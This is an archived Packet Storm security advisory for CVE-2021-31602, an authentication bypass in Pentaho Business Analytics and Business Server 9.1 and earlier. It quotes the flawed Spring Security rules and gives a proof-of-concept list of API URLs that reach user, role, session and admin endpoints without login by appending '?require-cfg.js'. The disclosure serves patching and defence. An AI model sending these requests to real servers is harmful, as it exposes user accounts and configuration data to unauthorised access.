exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

Pentaho Business Analytics / Pentaho Business Server 9.1 Authentication Bypass

Pentaho Business Analytics / Pentaho Business Server 9.1 Authentication Bypass
Posted Nov 5, 2021
Authored by Altion Malka, Alberto Favero

Pentaho Business Analytics and Pentaho Business Server versions 9.1 and below suffer from an authentication bypass vulnerability related to Spring APIs.

tags | exploit, bypass
advisories | CVE-2021-31602
SHA-256 | 7f8a25e1b9943928e3d57e11e94b4b22917396971502415544f387e2340268c3

Pentaho Business Analytics / Pentaho Business Server 9.1 Authentication Bypass

Change Mirror Download
Product: Pentaho Business Analytics / Pentaho Business Server
Vendor / Manufacturer: Hitachi Vantara
Affected Version(s): <= 9.1
Vulnerability Type: Authentication Bypass of Spring APIs
Solution Status: Fix Released on public GitHub repository
Manufacturer Notification: 8th February 2021
Solution Date: May 2021
Public Disclosure: 01 November 2021
CVE Reference: CVE-2021-31602
Author(s) of Advisory: Alberto Favero ( HawSec ) & Altion Malka

--- ### --- ### ---

Product Description:

Pentaho is business intelligence (BI) software that provides data
integration, OLAP services, reporting, information dashboards, data mining
and extract, transform, load (ETL) capabilities. Its headquarters are in
Orlando, Florida. Pentaho was acquired by Hitachi Data Systems in 2015 and
in 2017 became part of Hitachi Vantara.

( Source: https://en.wikipedia.org/wiki/Pentaho )

--- ### --- ### ---

Vulnerability Details:

The security model of Pentaho Business Analytics consists of different
layers of Access Control (AC). The applicationContext directives defined in
the applicationContext-spring-security.xml file were of particular interest
and further examination of the access control entries revealed the
following misconfigurations.

--- ~~~ --- ~~~ ---
<sec:intercept-url pattern="\A/api/.*require-cfg.js.*\Z"
access="Anonymous,Authenticated" />
<sec:intercept-url pattern="\A/api/.*require-js-cfg.js.*\Z"
access="Anonymous,Authenticated" />
<sec:intercept-url pattern="\A/api/.*\Z" access="Authenticated" />
--- ~~~ --- ~~~ ---

Specifically, the last directive explicitly declares that the available
endpoints require that users are authenticated. However, the first and
second directives bypass this requirement by allowing unauthenticated
access to arbitrary "/api/*" endpoints when the "?require-cfg.js" URL
parameter is present. As a result, it is possible for unauthenticated users
to access arbitrary Pentaho API endpoints by including the
"?require-cfg.js" or "?require-js-cfg.js" URL parameter as part of the HTTP
request.

For example, the following URL can be used to retrieve the Pentaho API
version, http://localhost:8080/pentaho/api/version/show?require-cfg.js


--- ### --- ### ---

Proof of Concept (PoC):

See Ginger ( https://github.com/HawSec/ginger )

or

The following is a non-exhaustive list of the Pentaho API endpoints
susceptible to this vulnerability.

http://localhost:8080/pentaho/api/version/show?require-cfg.js
http://localhost:8080/pentaho/api/version/softwareUpdates?require-cfg.js
http://localhost:8080/pentaho/api/emailconfig/isValid?require-cfg.js
http://localhost:8080/pentaho/api/authorization/action/isauthorized?require-cfg.js
http://localhost:8080/pentaho/api/userroledao/userRoles?require-cfg.js
http://localhost:8080/pentaho/api/system/locale?require-cfg.js
http://localhost:8080/pentaho/api/system/timezones?require-cfg.js
http://localhost:8080/pentaho/api/system/executableTypes?require-cfg.js
http://localhost:8080/pentaho/api/theme/list?require-cfg.js
http://localhost:8080/pentaho/api/theme/active?require-cfg.js
http://localhost:8080/pentaho/api/userrolelist/users?require-cfg.js
http://localhost:8080/pentaho/api/userrolelist/roles?require-cfg.js
http://localhost:8080/pentaho/api/userrolelist/allRoles?require-cfg.js
http://localhost:8080/pentaho/api/userrolelist/systemRoles?require-cfg.js
http://localhost:8080/pentaho/api/userrolelist/extraRoles?require-cfg.js
http://localhost:8080/pentaho/api/userrolelist/permission-users?require-cfg.js
http://localhost:8080/pentaho/api/userrolelist/permission-roles?require-cfg.js
http://localhost:8080/pentaho/api/scheduler/state?require-cfg.js
http://localhost:8080/pentaho/api/scheduler/jobinfotest?require-cfg.js
http://localhost:8080/pentaho/api/scheduler/blockout/blockoutjobs?require-cfg.js
http://localhost:8080/pentaho/api/scheduler/blockout/hasblockouts?require-cfg.js
http://localhost:8080/pentaho/api/scheduler/blockout/shouldFireNow?require-cfg.js
http://localhost:8080/pentaho/api/scheduler/generatedContentForSchedule?require-cfg.js
http://localhost:8080/pentaho/api/repos/executableTypes?require-cfg.js
http://localhost:8080/pentaho/api/plugin-manager/overlays?require-cfg.js
http://localhost:8080/pentaho/api/mantle/locale?require-cfg.js
http://localhost:8080/pentaho/api/mantle/isAuthenticated?require-cfg.js
http://localhost:8080/pentaho/api/mantle/getAdminContent?require-cfg.js
http://localhost:8080/pentaho/api/mantle/settings?require-cfg.js
http://localhost:8080/pentaho/api/mantle/registeredPlugins?require-cfg.js
http://localhost:8080/pentaho/api/service/assignment?require-cfg.js
http://localhost:8080/pentaho/api/repo/files/reservedCharacters?require-cfg.js
http://localhost:8080/pentaho/api/repo/files/generatedContentForSchedule?require-cfg.js
http://localhost:8080/pentaho/api/repo/files/canAdminister?require-cfg.js
http://localhost:8080/pentaho/api/repo/files/reservedCharactersDisplay?require-cfg.js
http://localhost:8080/pentaho/api/session/userName?require-cfg.js
http://localhost:8080/pentaho/api/session/workspaceDirForUser/{user}?require-cfg.js
http://localhost:8080/pentaho/api/session/setredirect?require-cfg.js
http://localhost:8080/pentaho/api/session/userWorkspaceDir?require-cfg.js

--- ### --- ### ---


Credits:

This vulnerability was discovered by Alberto Favero & Altion Malka

--- ### --- ### ---




--
BlackHawk - hawkgotyou@gmail.com

Experientia senum, agilitas iuvenum.
Adversa fortiter. Dubia prudenter.


Login or Register to add favorites

File Archive:

August 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Aug 1st
    15 Files
  • 2
    Aug 2nd
    22 Files
  • 3
    Aug 3rd
    0 Files
  • 4
    Aug 4th
    0 Files
  • 5
    Aug 5th
    15 Files
  • 6
    Aug 6th
    11 Files
  • 7
    Aug 7th
    43 Files
  • 8
    Aug 8th
    42 Files
  • 9
    Aug 9th
    0 Files
  • 10
    Aug 10th
    0 Files
  • 11
    Aug 11th
    0 Files
  • 12
    Aug 12th
    0 Files
  • 13
    Aug 13th
    0 Files
  • 14
    Aug 14th
    0 Files
  • 15
    Aug 15th
    0 Files
  • 16
    Aug 16th
    0 Files
  • 17
    Aug 17th
    0 Files
  • 18
    Aug 18th
    0 Files
  • 19
    Aug 19th
    0 Files
  • 20
    Aug 20th
    0 Files
  • 21
    Aug 21st
    0 Files
  • 22
    Aug 22nd
    0 Files
  • 23
    Aug 23rd
    0 Files
  • 24
    Aug 24th
    0 Files
  • 25
    Aug 25th
    0 Files
  • 26
    Aug 26th
    0 Files
  • 27
    Aug 27th
    0 Files
  • 28
    Aug 28th
    0 Files
  • 29
    Aug 29th
    0 Files
  • 30
    Aug 30th
    0 Files
  • 31
    Aug 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close